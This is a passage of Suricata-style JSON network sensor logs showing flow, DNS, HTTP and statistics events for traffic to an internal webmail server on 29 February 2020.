"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2348}},"flow_mgr":{"closed_pruned":2707,"new_pruned":15,"est_pruned":2319,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21164,"memcap_state":0,"memcap_global":0},"http":{"memuse":54407,"memcap":0}}} {"timestamp":"2020-02-29T00:09:07.001323+0000","flow_id":1073078963949837,"event_type":"flow","src_ip":"192.168.10.122","src_port":49816,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:06.676109+0000","end":"2020-02-29T00:04:06.787475+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:08.000523+0000","flow_id":1274951032280348,"event_type":"flow","src_ip":"192.168.10.130","src_port":34764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1291,"bytes_toclient":1056,"start":"2020-02-29T00:08:02.038172+0000","end":"2020-02-29T00:08:07.254988+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:10.000529+0000","flow_id":1197830584211840,"event_type":"flow","src_ip":"192.168.10.122","src_port":45696,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:09.268672+0000","end":"2020-02-29T00:04:09.374158+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:10.345020+0000","flow_id":339305296184252,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33829,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61178,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:10.453617+0000","flow_id":339305296184252,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33829,"proto":"UDP","dns":{"type":"answer","id":61178,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:10.453617+0000","flow_id":339305296184252,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33829,"proto":"UDP","dns":{"type":"answer","id":61178,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:10.521043+0000","flow_id":127932775662908,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":410}} {"timestamp":"2020-02-29T00:09:10.521043+0000","flow_id":127932775662908,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":410},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:09:11.000542+0000","flow_id":1451800606154932,"event_type":"flow","src_ip":"192.168.10.81","src_port":52702,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":2,"pkts_toclient":1,"bytes_toserver":128,"bytes_toclient":74,"start":"2020-02-29T00:08:10.925876+0000","end":"2020-02-29T00:08:10.926127+0000","age":0,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"16","tcp_flags_ts":"06","tcp_flags_tc":"12","syn":true,"rst":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:11.001968+0000","flow_id":1684033767133257,"event_type":"flow","src_ip":"192.168.10.122","src_port":53940,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:10.577609+0000","end":"2020-02-29T00:04:10.689883+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:11.764976+0000","flow_id":1278752082539280,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34774,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6127},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30701,"tx_id":0}} {"timestamp":"2020-02-29T00:09:11.000848+0000","flow_id":1066967241298197,"event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52700,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/search-topbar.png","state":"CLOSED","stored":false,"size":363,"tx_id":2}} {"timestamp":"2020-02-29T00:09:12.622045+0000","flow_id":1076287324585437,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41432,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:12.730774+0000","flow_id":1076287324585437,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37956,"proto":"UDP","dns":{"type":"answer","id":41432,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:12.730774+0000","flow_id":1076287324585437,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37956,"proto":"UDP","dns":{"type":"answer","id":41432,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:12.821690+0000","flow_id":2001607963729589,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34778,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3336}} {"timestamp":"2020-02-29T00:09:13.002042+0000","flow_id":1066967241298197,"event_type":"flow","src_ip":"192.168.10.81","src_port":52700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":21,"bytes_toserver":2524,"bytes_toclient":19141,"start":"2020-02-29T00:08:07.954645+0000","end":"2020-02-29T00:08:10.923602+0000","age":3,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:14.000277+0000","event_type":"stats","stats":{"uptime":14206,"capture":{"kernel_packets":134195,"kernel_drops":0},"decoder":{"pkts":134204,"bytes":92704354,"invalid":185,"ipv4":132733,"ipv6":8,"ethernet":134204,"raw":0,"null":0,"sll":0,"tcp":127551,"udp":4982,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2730,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2746,"synack":2737,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1771,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2273,"failed_udp":110},"tx":{"http":4569,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2352}},"flow_mgr":{"closed_pruned":2709,"new_pruned":15,"est_pruned":2322,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":2,"flows_timeout":3,"flows_timeout_inuse":1,"flows_removed":2,"rows_checked":65536,"rows_skipped":65530,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20832,"memcap_state":0,"memcap_global":0},"http":{"memuse":76072,"memcap":0}}} {"timestamp":"2020-02-29T00:09:14.001007+0000","flow_id":1835650407822727,"event_type":"flow","src_ip":"192.168.10.122","src_port":34876,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:13.095623+0000","end":"2020-02-29T00:04:13.201001+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:14.001181+0000","flow_id":1842054204037946,"event_type":"flow","src_ip":"192.168.10.122","src_port":56174,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:13.858938+0000","end":"2020-02-29T00:04:13.964382+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:14.001244+0000","flow_id":1596077147384852,"event_type":"flow","src_ip":"192.168.10.130","src_port":34766,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1237,"bytes_toclient":6071,"start":"2020-02-29T00:08:07.945172+0000","end":"2020-02-29T00:08:13.158534+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:15.521386+0000","flow_id":127932775662908,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52710,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":410},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":757,"tx_id":0}} {"timestamp":"2020-02-29T00:09:17.000561+0000","flow_id":422558938389413,"event_type":"flow","src_ip":"192.168.10.81","src_port":52704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1227,"bytes_toclient":1755,"start":"2020-02-29T00:08:11.088997+0000","end":"2020-02-29T00:08:16.285131+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:17.822586+0000","flow_id":2001607963729589,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34778,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3336},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":16766,"tx_id":0}} {"timestamp":"2020-02-29T00:09:18.001282+0000","flow_id":1214726986095481,"event_type":"flow","src_ip":"192.168.10.122","src_port":48057,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:17.809849+0000","end":"2020-02-29T00:04:17.921212+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:21.000257+0000","event_type":"stats","stats":{"uptime":14213,"capture":{"kernel_packets":134227,"kernel_drops":0},"decoder":{"pkts":134227,"bytes":92710169,"invalid":185,"ipv4":132756,"ipv6":8,"ethernet":134227,"raw":0,"null":0,"sll":0,"tcp":127572,"udp":4984,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2731,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2747,"synack":2738,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1772,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2274,"failed_udp":110},"tx":{"http":4570,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2353}},"flow_mgr":{"closed_pruned":2712,"new_pruned":15,"est_pruned":2325,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19839,"memcap_state":0,"memcap_global":0},"http":{"memuse":1937,"memcap":0}}} {"timestamp":"2020-02-29T00:09:23.000410+0000","flow_id":1027835779501480,"event_type":"flow","src_ip":"192.168.10.122","src_port":40419,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:22.216488+0000","end":"2020-02-29T00:04:22.321659+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:24.000231+0000","flow_id":1696278719705921,"event_type":"flow","src_ip":"192.168.10.122","src_port":56324,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:04:23.537409+0000","end":"2020-02-29T00:04:23.642729+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:24.001086+0000","flow_id":871752373023523,"event_type":"flow","src_ip":"192.168.10.122","src_port":50439,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:22.963363+0000","end":"2020-02-29T00:04:23.068671+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:24.001803+0000","flow_id":1497310064742804,"event_type":"flow","src_ip":"192.168.10.122","src_port":56584,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:04:23.725396+0000","end":"2020-02-29T00:04:23.830890+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:26.000361+0000","flow_id":1446393227616656,"event_type":"flow","src_ip":"192.168.10.122","src_port":43939,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:25.434576+0000","end":"2020-02-29T00:04:25.539965+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:26.001140+0000","flow_id":533480764378464,"event_type":"flow","src_ip":"192.168.10.81","src_port":52706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1291,"bytes_toclient":1062,"start":"2020-02-29T00:08:20.363872+0000","end":"2020-02-29T00:08:25.580042+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:27.000298+0000","flow_id":2004988097150431,"event_type":"flow","src_ip":"192.168.10.130","src_port":34760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":18,"bytes_toserver":2119,"bytes_toclient":16868,"start":"2020-02-29T00:07:43.802271+0000","end":"2020-02-29T00:08:26.308021+0000","age":43,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:28.000219+0000","event_type":"stats","stats":{"uptime":14220,"capture":{"kernel_packets":134227,"kernel_drops":0},"decoder":{"pkts":134227,"bytes":92710169,"invalid":185,"ipv4":132756,"ipv6":8,"ethernet":134227,"raw":0,"null":0,"sll":0,"tcp":127572,"udp":4984,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2731,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2747,"synack":2738,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1772,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2274,"failed_udp":110},"tx":{"http":4570,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2353}},"flow_mgr":{"closed_pruned":2712,"new_pruned":15,"est_pruned":2329,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65531,"rows_empty":3,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18186,"memcap_state":0,"memcap_global":0},"http":{"memuse":1777,"memcap":0}}} {"timestamp":"2020-02-29T00:09:28.001781+0000","flow_id":2038445879581300,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"154.11.146.39","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:04:27.449140+0000","end":"2020-02-29T00:04:27.609675+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:30.000677+0000","flow_id":1612243390009016,"event_type":"flow","src_ip":"192.168.10.122","src_port":57135,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:29.495288+0000","end":"2020-02-29T00:04:29.600386+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:33.000442+0000","flow_id":1188136844541723,"event_type":"flow","src_ip":"192.168.10.122","src_port":47715,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:32.278299+0000","end":"2020-02-29T00:04:32.386792+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:33.000771+0000","flow_id":1403928886416178,"event_type":"flow","src_ip":"192.168.10.122","src_port":46632,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:32.103218+0000","end":"2020-02-29T00:04:32.211965+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:35.000237+0000","event_type":"stats","stats":{"uptime":14227,"capture":{"kernel_packets":134227,"kernel_drops":0},"decoder":{"pkts":134227,"bytes":92710169,"invalid":185,"ipv4":132756,"ipv6":8,"ethernet":134227,"raw":0,"null":0,"sll":0,"tcp":127572,"udp":4984,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091872},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2731,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2747,"synack":2738,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1772,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2274,"failed_udp":110},"tx":{"http":4570,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2353}},"flow_mgr":{"closed_pruned":2714,"new_pruned":15,"est_pruned":2334,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":0,"flows_timeout":3,"flows_timeout_inuse":1,"flows_removed":2,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17193,"memcap_state":0,"memcap_global":0},"http":{"memuse":1777,"memcap":0}}} {"timestamp":"2020-02-29T00:09:40.005609+0000","flow_id":1506149123404467,"event_type":"flow","src_ip":"192.168.10.130","src_port":34768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":12,"bytes_toserver":1233,"bytes_toclient":9789,"start":"2020-02-29T00:08:26.307891+0000","end":"2020-02-29T00:08:38.282721+0000","age":12,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:40.919718+0000","flow_id":653855817992358,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49092,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64267,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:41.000832+0000","flow_id":384277881088369,"event_type":"flow","src_ip":"192.168.10.122","src_port":53660,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:40.321905+0000","end":"2020-02-29T00:04:40.431524+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:41.001029+0000","flow_id":2230598437064297,"event_type":"flow","src_ip":"192.168.10.130","src_port":34770,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":314,"bytes_toclient":820,"start":"2020-02-29T00:08:26.872041+0000","end":"2020-02-29T00:08:27.455695+0000","age":1,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"17","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:41.028314+0000","flow_id":653855817992358,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49092,"proto":"UDP","dns":{"type":"answer","id":64267,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:41.028314+0000","flow_id":653855817992358,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49092,"proto":"UDP","dns":{"type":"answer","id":64267,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:41.226094+0000","flow_id":1979596258201268,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34780,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 